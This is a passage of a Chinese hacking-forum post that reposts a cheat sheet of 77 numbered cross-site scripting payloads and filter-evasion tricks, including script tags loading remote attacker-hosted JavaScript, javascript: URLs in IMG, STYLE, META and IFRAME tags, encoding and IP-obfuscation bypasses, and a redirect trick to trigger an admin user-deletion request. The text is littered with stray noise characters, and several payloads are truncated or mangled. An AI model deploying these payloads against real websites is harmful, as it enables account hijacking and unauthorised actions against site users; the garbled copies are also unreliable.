貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
7 F# I& ]) N1 g* x3 h- l(1)普通的XSS JavaScript注入
7 k! w( e: r$ l- u1 L<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. h/ m7 f0 d5 ? j) m(2)IMG标签XSS使用JavaScript命令6 B2 p3 H% s& W5 W% C! R/ C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 A, G# g7 B, O h(3)IMG标签无分号无引号% y8 H1 l1 O/ f
<IMG SRC=javascript:alert(‘XSS’)>3 }6 T1 S% u0 n. R4 D/ h4 C
(4)IMG标签大小写不敏感( R" @" V2 ?3 N, F3 `/ P
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) U/ I$ u* A& O, Y/ K
(5)HTML编码(必须有分号)! V0 S; x1 F* _8 s* B1 }
<IMG SRC=javascript:alert(“XSS”)>
0 t+ P' @# T8 k. |+ R* a p9 Q8 B" p(6)修正缺陷IMG标签
: X! ?% t; Q' x7 N: ]! z<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ K& r$ K3 I* q3 F
X; K5 [) D! G* i! l) l+ D
/ `1 y( ~# i0 v1 ^4 T(7)formCharCode标签(计算器). c8 |, h: L; G4 G
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. v& N( ~: O* a(8)UTF-8的Unicode编码(计算器)
' c# |" V5 s i4 e& W<IMG SRC=jav..省略..S')>
$ Z, G1 q% s; W% O$ B) E(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 V$ q1 Q* V& _0 x& E; ]9 R9 n
<IMG SRC=jav..省略..S')>
7 h/ F6 ]5 ]. w0 B% G5 W8 P(10)十六进制编码也是没有分号(计算器)* ^5 g2 u1 L* l, g4 d% y
<IMG SRC=java..省略..XSS')>. y, B2 a( _8 B6 J, _
(11)嵌入式标签,将Javascript分开7 X# R2 v* X( [* Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 T" p' o$ h" S! O% l) h4 R
(12)嵌入式编码标签,将Javascript分开2 F" N8 ]0 m* o9 m) j2 |7 H9 J _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ S( z" K3 r( O, H: r(13)嵌入式换行符+ C/ G9 A4 f. f4 ^& l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! ^3 n' m6 C9 T! Y(14)嵌入式回车0 Q3 _* e, k1 T/ X9 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 U8 L W- N" L# }$ c/ Y4 K4 M2 h+ J! C(15)嵌入式多行注入JavaScript,这是XSS极端的例子: V0 A8 ]9 q; T4 ^9 K; \
<IMG SRC=”javascript:alert(‘XSS‘)”>
* I4 [5 Z4 J% d, c. ?(16)解决限制字符(要求同页面)
; j1 D6 {) X; `, V, x8 W<script>z=’document.’</script>6 b$ A9 O2 R2 r$ k, \
<script>z=z+’write(“‘</script>% S! l( P, N, s. u/ D3 A
<script>z=z+’<script’</script>) l, w. E4 J, e' w) R; _
<script>z=z+’ src=ht’</script>
( A' W2 J, j! V7 y" S" J<script>z=z+’tp://ww’</script>$ l" `6 D) ?$ I2 P9 N
<script>z=z+’w.shell’</script>, Q) @6 S* j9 v- ~
<script>z=z+’.net/1.’</script>9 C/ l: x; ?/ u k) W$ z- O4 d* ?
<script>z=z+’js></sc’</script>6 n, d" y/ c+ c) Q- \: [' |/ G, U
<script>z=z+’ript>”)’</script>
& S" n. D4 v0 L; z<script>eval_r(z)</script>
2 e3 s4 S) Q' L3 S(17)空字符12-7-1 T00LS - Powered by Discuz! Board" X/ ]3 F$ h8 B0 X7 _
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
3 v. p! b. D$ e' z& Q+ uperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' Q {2 x% E1 |3 |+ I7 f4 |" {(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* q; O! e u9 j$ R. [# |perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& M6 g! H- w( k) y+ A# X
(19)Spaces和meta前的IMG标签
& m+ K" @3 X/ T, v. e<IMG SRC=” javascript:alert(‘XSS’);”>
* x# I9 m8 S7 M S, q e3 r(20)Non-alpha-non-digit XSS
# E2 u2 G& G# A+ u& X+ G- z<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ X& d) R. n" ]( [/ \
(21)Non-alpha-non-digit XSS to 2' `5 x5 h( {% q! g, @4 K
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 w/ R0 o9 |& |. [& x+ ~
(22)Non-alpha-non-digit XSS to 3
+ H( }; R6 R2 }<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 q6 T4 t7 @5 i: R6 r
(23)双开括号
& z5 w9 r/ {" ~8 l3 V& j( Y4 z<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! J; o/ U4 J6 {& K3 f8 _7 Q(24)无结束脚本标记(仅火狐等浏览器)- j4 y1 t5 T/ c- J7 E& w+ \/ w
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>9 @5 o. I& X: e
(25)无结束脚本标记2
" G4 R1 Y1 b) {: Y* O<SCRIPT SRC=//3w.org/XSS/xss.js> \* u5 d! E, i+ Z. ~# c" a/ B
(26)半开的HTML/JavaScript XSS
) p# o; Z& \! A% F. x<IMG SRC=”javascript:alert(‘XSS’)”
# O. E: d+ \6 Q8 E(27)双开角括号
- n, e: U0 U1 S* U" C$ V# ~! u<iframe src=http://3w.org/XSS.html <% q: [. y7 U; e5 T& X" r6 ^- y$ G$ C
(28)无单引号 双引号 分号
# M; z1 i$ j; k/ W* _1 D4 L( {% W! M<SCRIPT>a=/XSS/! `" T" b$ ], y7 a' S2 p- |9 t |
alert(a.source)</SCRIPT>
- b4 w. y( {+ v. h# ~6 g1 D(29)换码过滤的JavaScript
( {3 e2 C& U/ U9 h! m, L( }0 B4 g/ d\”;alert(‘XSS’);//
0 e. P- A9 Q7 E6 d; @4 N ?+ H(30)结束Title标签
4 E0 ~( s% B" o+ b</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ R) D) l1 K5 q: e9 S
(31)Input Image- j+ |! J" i! ?+ z, r
<INPUT SRC=”javascript:alert(‘XSS’);”>
7 h9 @7 f/ B6 n6 L" G1 m(32)BODY Image
$ c! L) S2 Y: s6 }3 C( e<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 [) b: `% `' |( j: I/ f
(33)BODY标签) X& G5 Y2 E5 L: v ]* s) M6 r' R4 Z
<BODY(‘XSS’)>
+ U1 M: Z( [: }(34)IMG Dynsrc
1 @& }& I7 x# ]# V- a3 [<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ ]( P. D/ A0 }% _1 G4 ~(35)IMG Lowsrc
! F+ k9 b1 n* t0 ^, g2 a' e<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% E/ q2 G' e8 j: t) _; S(36)BGSOUND/ B2 @9 l# }; r! X. ^4 o* t
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( n6 A! I3 w9 z1 K+ }8 b$ {- s(37)STYLE sheet, c* _+ q( u0 M$ f1 T
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>4 ]5 u3 c0 D' q3 r; [0 T
(38)远程样式表
% G9 g3 a- e" X<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# ]- I3 C5 B9 {! ?(39)List-style-image(列表式)0 s+ ]6 K" g- K0 }. J' |
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 K8 K5 A2 P4 _0 E4 d(40)IMG VBscript; ~* o g' r1 ?$ O; b
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( s" K' s A- a4 x; L# e7 Z( c(41)META链接url8 \0 C; |: m4 e9 _2 p
/ ^- z* o$ q2 E4 q
9 k& q9 X1 l G2 R4 F<META HTTP-EQUIV=”refresh” CONTENT=”0;
4 ~, r5 G6 V+ V ? {URL=http://;URL=javascript:alert(‘XSS’);”># ~) H9 j. i* D! B/ Q+ @% u/ s1 X8 g
(42)Iframe
- d, r: W% Y! _<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" _% W) v. ^3 c9 N; ?7 I4 |* Q(43)Frame
+ f8 s6 X# o0 d. T2 y1 Z' i% A) Q<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board+ s( I* l4 n# w9 y$ O4 k9 D
https://www.t00ls.net/viewthread ... table&tid=15267 3/6! K/ e5 c- H: q6 @3 e" ~
(44)Table
( P: w# Y1 x, D$ K( ]5 c<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. t, t4 T% ]0 T1 M% m, \: E
(45)TD
" c. W8 |2 c4 A [- a, W<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* F- t& W, l5 j3 n+ [& v' X2 E
(46)DIV background-image& s. n8 t S: O+ e% N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 S( P5 c2 ~% ]9 G(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
0 k Z) X. k2 y( z- }; J7 ?8&13&12288&65279)5 @9 h) z6 H5 u7 L" A
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% A- W$ e- p& x# B8 i+ v) K! Z1 T$ v(48)DIV expression
- b8 K D0 W' V<DIV STYLE=”width: expression_r(alert(‘XSS’));”>3 \5 P6 ]& h7 ]
(49)STYLE属性分拆表达
5 C, v8 ?) `& F' D- d5 ~9 a6 w( X$ N" a<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>8 J& u( D6 S1 }' o! |/ N
(50)匿名STYLE(组成:开角号和一个字母开头)$ ~* Y' ~0 `' V% F+ ^9 C
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 }0 t5 \% o y. g: p
(51)STYLE background-image
: W% `1 X$ M# \ e2 Z<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
) \, c6 N" \$ ]5 j5 V; J( R9 jCLASS=XSS></A>
- x2 V+ W, h% H& N. s(52)IMG STYLE方式
* D- p# y3 r, ~1 T, Q9 v/ iexppression(alert(“XSS”))’>. ?6 A5 O# D( \ {* m" S
(53)STYLE background P; m# E' m+ Y
<STYLE><STYLE& H/ ?: w! w A1 r, v
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ _* V& }" Y2 g4 j/ C5 [1 M/ I(54)BASE" J, T3 o' o" ]2 D! B# T& s
<BASE HREF=”javascript:alert(‘XSS’);//”>
% W; ?) Z1 d+ z. I2 a# }* u(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. B* Y e+ o! U; C/ O: f' C! J" O
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' Q- h3 H9 u) y* ` {
(56)在flash中使用ActionScrpt可以混进你XSS的代码
) d- k4 W+ t$ I( g- }a=”get”;
7 H1 ?6 u- Z* q7 B4 d8 @b=”URL(\”";3 z5 ?# b6 Y# }' H% f% g j E
c=”javascript:”;' a8 W6 E5 L# u$ P N; I
d=”alert(‘XSS’);\”)”;
+ v. v2 I4 ?- o0 L1 A6 \eval_r(a+b+c+d);$ e) F8 R# E8 ]5 B- a) S
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& d1 Y& S `+ i% F5 F
<HTML xmlns:xss>
' H# l( j& R+ \2 Y<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 b# \% T) g6 G9 J* X5 ]
<xss:xss>XSS</xss:xss>6 }0 f" L3 g( W/ c3 S3 d' n" g
</HTML>
; A: [! ^) i% w2 B1 {(58)如果过滤了你的JS你可以在图片里添加JS代码来利用3 H2 f4 J$ T2 ^' M. T- l m
<SCRIPT SRC=””></SCRIPT>3 b1 r/ x; {, ?/ K$ ?
(59)IMG嵌入式命令,可执行任意命令
( b$ N4 v- X O) I7 k! H0 `7 X7 f+ r ~8 o; o<IMG SRC=”http://www.XXX.com/a.php?a=b”>: I8 h: \, A, w* }
(60)IMG嵌入式命令(a.jpg在同服务器)8 ]5 i4 W: ~+ Y+ @$ G
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser& h' h$ w; W; ]6 z2 l
(61)绕符号过滤
}5 Y6 X9 w2 N1 @3 ~7 r2 ]<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 S$ p- M4 |1 C' y% b
(62)
! F6 ^% }$ _4 q<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% q2 H4 k: \/ c# g9 [3 j2 R9 K(63)+ x. L+ z# k; f
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>, O3 a# h, n7 h. K' n, S5 T
(64)
2 M. S; G& \" u# O( L<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>7 T: j1 K! c M# g
(65)' L) O( B7 ~) s& O. n0 m$ x
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
* U* t3 A, V4 {(66)12-7-1 T00LS - Powered by Discuz! Board
/ K/ J" E4 f6 Ehttps://www.t00ls.net/viewthread ... table&tid=15267 4/6# u* w! B5 W$ u# L" J' g
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
* R7 }& [6 X7 s9 e( }, W(67)1 ]2 O; ~, |' N
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>! V1 U3 z4 ]$ @+ O; R/ T
</SCRIPT>
; a" U( _4 C0 S/ X" d(68)URL绕行, \7 S- L, ^$ H. r W& S {
<A HREF=”http://127.0.0.1/”>XSS</A>, K5 f! B1 v5 A
(69)URL编码
S) j; |7 Y8 B; x, A4 W<A HREF=”http://3w.org”>XSS</A>
6 T9 G2 t, T8 D- u7 M! N- Y(70)IP十进制2 e/ D3 `) M7 j' n
<A HREF=”http://3232235521″>XSS</A>$ X+ x2 s0 I/ m, \ x
(71)IP十六进制0 |: G8 f |( ?! ]6 Q
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>6 W; B0 p4 t! r/ |9 Q
(72)IP八进制
/ Q! [% L5 r2 e* ?) Q+ s1 [<A HREF=”http://0300.0250.0000.0001″>XSS</A>
9 |9 d& d, u$ l$ V(73)混合编码- q) [2 V% C5 `8 R# S
<A HREF=”h8 R& \, J! @6 D: k+ C. b% G
tt p://6 6.000146.0×7.147/”">XSS</A>
" I; V7 ~, V0 X0 I0 Y0 k(74)节省[http:]6 y8 E% r: o! h9 C
<A HREF=”//www.google.com/”>XSS</A>
9 U7 {$ A' c3 [% b e9 [(75)节省[www]
' E+ Y* p' h7 h" z+ J4 d- l<A HREF=”http://google.com/”>XSS</A>5 I- ~: u( W6 b. R0 O+ T7 W$ M
(76)绝对点绝对DNS
+ R9 r, U* Z6 P' G) `" l<A HREF=”http://www.google.com./”>XSS</A>
4 e% u7 A1 R. a9 G(77)javascript链接) v2 F3 @/ V, m$ z
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) F6 w0 A/ F& |* z" }1 j: t; V
( M8 P" d* f d
原文地址:http://fuzzexp.org/u/0day/?p=14
. h9 f$ e4 E9 V% z K2 [# i; d, p2 ~9 R6 `4 E" k: N8 Y
|
发表于 2013-4-19 19:22:37
收藏
支持
反对